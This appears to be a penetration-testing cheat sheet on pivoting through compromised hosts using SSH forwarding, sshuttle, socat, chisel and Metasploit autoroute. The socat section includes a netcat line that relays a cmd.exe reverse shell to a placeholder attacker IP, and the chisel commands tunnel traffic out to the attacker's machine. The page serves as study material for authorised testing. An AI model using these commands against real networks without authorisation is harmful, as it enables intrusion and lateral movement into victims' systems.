Tunnelling & Port Forwarding
If you have found hosts on a different network that you do not have access to, you will need to use one of the compromised hosts to pivot to the subnet. For doing so, you can use the several techniques and tools that you will see in this section.
Use the following command if you want to access a website (port 80) on a subnet through an intermediary computer via SSH. Then, you will be able to access the website through
localhost
(port 8000).ssh -L localhost:8000:<VICTIM_IP>:80 <PIVOT_USER>@<PIVOT_IP> [-fN]
- The
-L
flag creates a link to a local port. - The
-f
flag is used to set SSH to the background so that we can still use our terminal. - The
-N
flag iindicates to SSH that we do not want to execute any commands.
This allows anyone on the remote server to connect to TCP port 8080 on the remote server. The connection will then be tunnelled back to the client host, and the client then makes a TCP connection to port 80 on
localhost
.ssh -R 8080:localhost:80 <PIVOT_USER>@<PIVOT_IP> [-fN]
This command will open port 1337 on your machine as a proxy to send data to the subnet. This is useful when combined with a tool like proxychains, so you can access different ports and IPs with the same connection.
ssh -D 1337 <PIVOT_USER>@<PIVOT_IP> [-fN]
You might encounter a situation where you require Internet access for downloading tools, installing packages, etc. but the machine doesn't have Internet and you only can connect through SSH with a machine with Internet access. For those cases, you can do the following:
1. Install a proxy on the machine with Internet access.
sudo apt update && sudo apt install squid -y
Modify the squid configuration by commenting all
http_access deny *
and add http_access allow all
. Then, restart the squid server:sudo service squid restart
2. Execute the following lines in the offline machine, thus the traffic will go through the future port forwarding.
export http_proxy=http://127.0.0.1:3129
export https_proxy=http://127.0.0.1:3129
Note: To make it permanently through all the terminals add the before-mentioned lines into the
/etc/environment
file.Furthermore, if you want to use apt to install packages add the following lines into the
/etc/apt/apt.conf.d/50apt-file.conf
file.Acquire::http::Proxy "http://localhost:3129";
Acquire::https::Proxy "https://localhost:3129";
3. Finally, do the port forwarding.
ssh -R 3129:localhost:3128 <USER>@<OFFILNE_HOST>
Shuttle allows us to route networks through SSH tunnels as if it were a VPN.
- Installation command:
sudo apt install sshutle
The command to use shuttle is:
sshuttle -r <PIVOT_USER>@<PIVOT_IP> {-N | <SUBNET/X>}
The
-N
flag is used for sshuttle to try to guess the server's subnet.Unfortunately, sshuttle has no shortcut to use a private key to authenticate to the SSH server. However, you can use the
--ssh-cmd
flag to work around this problem.sshuttle -r <PIVOT_USER>@<PIVOT_IP> --ssh-cmd "ssh -i <PRIVATE_KEY>" {-N | <SUBNET/X>}
Nota:
You may get the following error when connecting with sshuttle:
client: fatal: server died with error code 255
.This can happen when the compromised machine you connect to is part of the subnet you are trying to access. For example, if we were connecting to 172.16.0.5 and tried to forward 172.16.0.0/24, we would be including the compromised server within the newly forwarded subnet, thus breaking the connection and causing the tool to die.
To avoid this, we tell sshuttle to exclude the compromised server from the subnet range using the
-x
option. To use our example above:sshuttle -r <PIVOT_USER>@<PIVOT_IP> <SUBNET/X> -x <PIVOT_IP>
Socat is a relay for bidirectional data transfer between two independent data channels.
Download links:
kali@kali:$ sudo nc -lvnp 443
user@victim_ONE:$ socat tcp-l:8000 tcp:<ATTACKER_IP>:443
user@victim_TWO:$ nc 127.0.0.1 8000 -e C:\Windows\System32\cmd.exe
tcp-l: 8000
is used to create the first half of the connection: an IPv4 tcp listening port on 8000 on the victim_ONE
. The second have of the connection is when you connect to the victim_ONE
machine from the victim_TWO
machine.First, on our pivoting machine, we run the following command:
./socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
This command opens two ports: 8000 and 8001, creating a local port relay. What goes into one of them will come out of the other. For this reason, port 8000 also has the
fork
and reuseaddr
options to allow us to create more than one connection using this port going forward.The following command establishes a connection between our listening port 8001 on the pivoting machine and the open port on the target server (80).
./socat tcp:<PIVOTING_IP>:8001 tcp:<TARGET_IP>:80,fork &
This would create a link between port 8000 on our attacking machine and port 80 on the target machine, which means we could go to
localhost:8000
in the web browser of our attacking machine to load the web page served by the target.In order to access the website on port 80 on the victim's machine through
localhost:8080
, we need to execute the following commands.Attacking machine:
socat -v TCP-LISTEN:<PIVOTING_PORT> TCP-LISTEN:<SRC_PORT>
# Example
socat -v TCP-LISTEN:10000 TCP-LISTEN:8080
Pivoting machine:
socat TCP:<ATTACKER_IP>:<PIVOTING_PORT> TCP:localhost:<DST_PORT>
# Example
socat TCP:10.9.160.251:10000 TCP:localhost:80
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable, including both client and server. Written in Go.
Furthermore, Chisel is mainly useful for passing through firewalls.
On our attacking machine, we set a port to listen (
--reverse
sets the port to listen.)../chisel server -p <LISTEN_PORT> --reverse &
On the compromised host, we would use the following command, which connects to the listening port of our attacking machine, completing the proxy.
./chisel client <ATTACKER_IP>:<LISTEN_PORT> R:socks &
The flag
R:socks
tells the chisel server that the proxy or port forwarding will be done on the client-side.The connection is made from the attacking machine to the compromised machine.
On the compromised machine we run:
./chisel server -p <LISTEN_PORT> --socks5
On the attacking machine we run::
./chisel client <TARGET_IP>:<LISTEN_PORT> CHISEL_PORT_SERVER:socks
Remote Port Forward is when we connect from the compromised target machine to create port forwarding.
On the attacking machine, we use the following command:
./chisel server -p <LISTEN_PORT> --reverse &
The command to connect to the attacking machine is as follows..
./chisel client <ATTACKER_IP>:<LISTEN_PORT> R:<LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT> &
Note the difference between
LISTEN_PORT
and LOCAL_PORT
. LISTEN_PORT is the port on which we start the chisel server, and LOCAL_PORT is the port we want to open on our attacker machine to bind to the desired destination port.We connect from our attacking machine to the chisel server on the compromised machine.
On the compromised machine, we create the chisel server.
./chisel server -p <LISTEN_PORT>
And now we connect from the attacking machine
./chisel client <PIVOT_IP>:<PIVOT_PORT> <LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT>
For example, if you want to connect to the application on
192.168.2.4:80
through the machine 192.168.1.2
, so you can access the web page accessing localhost:8080
on your machine. Execute the following commands:# Compromissed
./chisel server -p 8081
# Attacking machine
./chisel client 192.168.1.2:8081 8080:192.168.2.4:80
Once we have a meterpreter session, we can use the module
post/multi/manage/autoroute
to pivot to a different network through the compromised machine.use post/multi/manage/autoroute
set SESSION X
set SUBNET <SUBNET/X>
exploit
Then, with the module
auxiliary/server/socks_proxy
, we can use proxychains in order to route all our traffic.Note: By default, this module uses socks5 at port 1080.
# Might also work auxiliary/server/socks4a
use auxiliary/server/socks_proxy
exploit
Last modified 11mo ago